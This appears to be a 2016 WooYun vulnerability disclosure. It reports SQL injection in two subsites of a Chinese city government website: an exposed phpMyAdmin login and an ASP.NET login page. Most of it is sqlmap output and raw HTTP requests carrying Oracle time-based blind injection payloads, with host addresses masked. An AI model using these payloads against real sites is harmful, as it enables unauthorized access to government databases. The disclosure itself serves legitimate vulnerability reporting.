漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:某市政府网分站点存在post注入漏洞
提交时间:2016-01-17 16:28
修复时间:2016-02-27 11:49
公开时间:2016-02-27 11:49
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情 披露状态:
2016-01-17: 细节已通知厂商并且等待厂商处理中 2016-01-20: 厂商已经确认,细节仅向厂商公开 2016-01-30: 细节向核心白帽子及相关领域专家公开 2016-02-09: 细节向普通白帽子公开 2016-02-19: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
简要描述: RT
详细说明: phpmyadmin 地址泄露 http://**.**.**.**/db/index.php 版本是2.11.1 注入点:"http://**.**.**.**/db/index.php?lang=zh-gb2312&co nvcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=2cf2e60511edfbfd d010d7be7ad32f33"
POST data: pma_username=&pma_password=&server=1&lang=zh-gb2312&convcharset=iso-8 859-1 do you want to test this form? [Y/n/q] > y Edit POST data [default: pma_username=&pma_password=&server=1&lang=zh-gb2312&con vcharset=iso-8859-1] (Warning: blank fields detected): do you want to fill blank fields with random values? [Y/n] n [15:44:44] [INFO] using 'C:\sqlmap\output\**.**.**.**\session' as session file [15:44:44] [INFO] resuming injection data from session file [15:44:44] [INFO] resuming back-end DBMS 'oracle' from session file sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: POST Parameter: server Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: collation_connection=utf8_unicode_ci&convcharset=iso-8859-1&server= 1) AND 9468=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(111)||CHR(117)||CHR(74),5) AN D (6861=6861&lang=zh-gb2312 --- do you want to exploit this SQL injection? [Y/n] y [15:44:47] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0 back-end DBMS: Oracle
第二个注入站点:http://**.**.**.**/IPhone4/Login.aspx
POST /IPhone4/Login.aspx HTTP/1.1 Host: **.**.**.** Content-Length: 369 Cache-Control: max-age=0 Origin: http://**.**.**.** Upgrade-Insecure-Requests: 1 Referer: http://**.**.**.**/IPhone4/Login.aspx Accept-Encoding: gzip, deflate __VIEWSTATE=%2FwEPDwUKLTExMDcwNDM4OA9kFgJmD2QWAgIDDw9kFgIeCG9uY2hhbmdlBRNBbnRpU3FsVmFsaWQodGhpcyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FDEltYWdlQnV0dG9uMftaawGQ1UcrtskTl0Mslv1yonr%2F&__EVENTVALIDATION=%2FwEWBQLJxePqBwKj1dLzBwKC3IeGDALG8eCkDwLSwpnTCDbU6RHeNSzhZgnLugzDGGYJjnfo&txtUserCode=13888888888&btnLogin.x=37&btnLogin.y=23&txtUserPwd=6666
Cache-Control → private, max-age=10800, pre-check=10800 Connection → close Content-Type → text/html; charset=gb2312 Date → Sun, 10 Jan 2016 14:24:30 GMT Expires → Thu, 19 Nov 1981 08:52:00 GMT Last-Modified → Thu, 20 Sep 2007 16:35:26 GMT Server → Microsoft-IIS/6.0 X-Powered-By → ASP.NET
漏洞证明:
Title: Oracle AND time-based blind Payload: __VIEWSTATE=/wEPDwUKLTExMDcwNDM4OA9kFgJmD2QWAgIDDw9kFgIeCG9uY2hhbmd lBRNBbnRpU3FsVmFsaWQodGhpcyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgU IYnRuTG9naW4FDEltYWdlQnV0dG9uMftaawGQ1UcrtskTl0Mslv1yonr/') AND 4326=DBMS_PIPE.R ECEIVE_MESSAGE(CHR(117)||CHR(104)||CHR(88)||CHR(90),5) AND ('JHjr'='JHjr&__EVENT VALIDATION=/wEWBQLJxePqBwKj1dLzBwKC3IeGDALG8eCkDwLSwpnTCDbU6RHeNSzhZgnLugzDGGYJj nfo&txtUserCode=&btnLogin.x=1&btnLogin.y=1&txtUserPwd= ---
通过搜索引擎联合查询,发现 移动办公申报平台 都有多个站点
Test parameter: __VIEWSTATE Host IP: **.**.**.** Web Server: Microsoft-IIS/6.0 Powered-by: ASP.NET I guess injection type is Integer?! If injection failed, retry with a manual keyword. DB Server: Oracle Page Found: http://**.**.**.**/login.html N
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 危害等级:高
漏洞Rank:10
确认时间:2016-01-20 14:48
厂商回复: CNVD确认未复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置.
最新状态: 暂无